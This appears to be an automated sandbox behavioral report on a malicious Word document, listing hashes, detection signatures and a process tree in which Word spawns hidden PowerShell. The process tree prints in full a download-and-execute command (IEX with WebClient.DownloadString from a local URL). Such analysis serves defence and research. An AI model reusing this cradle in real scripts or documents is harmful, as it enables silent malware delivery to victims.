Analysis
-
max time kernel
17s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
03/11/2024, 21:01
Behavioral task
behavioral1
Sample
9cc036b0879d125d24401d0a89743fe5ace701dd6e107ea700f4adddb0238315.doc
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
9cc036b0879d125d24401d0a89743fe5ace701dd6e107ea700f4adddb0238315.doc
Resource
win10v2004-20241007-en
General
-
Target
9cc036b0879d125d24401d0a89743fe5ace701dd6e107ea700f4adddb0238315.doc
-
Size
29KB
-
MD5
ac9318d0e8db68d68897f7b226e17386
-
SHA1
96a6eadd0779bfbf47b3a1a3a21c6841faa7279e
-
SHA256
9cc036b0879d125d24401d0a89743fe5ace701dd6e107ea700f4adddb0238315
-
SHA512
c36009ed76e35a43401b2058060d6d4297a74f7ee98ba580cb4be6725c72b4662d043fcfabe073f3e561aa607835a44bfcca2dc5969777ce557fb0e22f2639a9
-
SSDEEP
192:5EO0lLZEvA+6/6r8px8SmvowzxHq30wa6Y6P0tPBxV05JB8aY:a/8iS8px8SMDHgBctK5J
Malware Config
Extracted
http://127.0.0.1:8000/arquivos/windows.txt
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 3044 1076 powershell.exe 29 -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3044 powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Office loads VBA resources, possible macro or embedded object present
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1076 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3044 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3044 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1076 WINWORD.EXE 1076 WINWORD.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1076 wrote to memory of 3044 1076 WINWORD.EXE 30 PID 1076 wrote to memory of 3044 1076 WINWORD.EXE 30 PID 1076 wrote to memory of 3044 1076 WINWORD.EXE 30 PID 1076 wrote to memory of 3044 1076 WINWORD.EXE 30 PID 1076 wrote to memory of 2664 1076 WINWORD.EXE 33 PID 1076 wrote to memory of 2664 1076 WINWORD.EXE 33 PID 1076 wrote to memory of 2664 1076 WINWORD.EXE 33 PID 1076 wrote to memory of 2664 1076 WINWORD.EXE 33
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9cc036b0879d125d24401d0a89743fe5ace701dd6e107ea700f4adddb0238315.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1076 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -w hidden -noninteractive "IEX((new-object net.webclient).downloadstring('http://127.0.0.1:8000/arquivos/windows.txt'))"2⤵
- Process spawned unexpected child process
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3044
-
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2664
-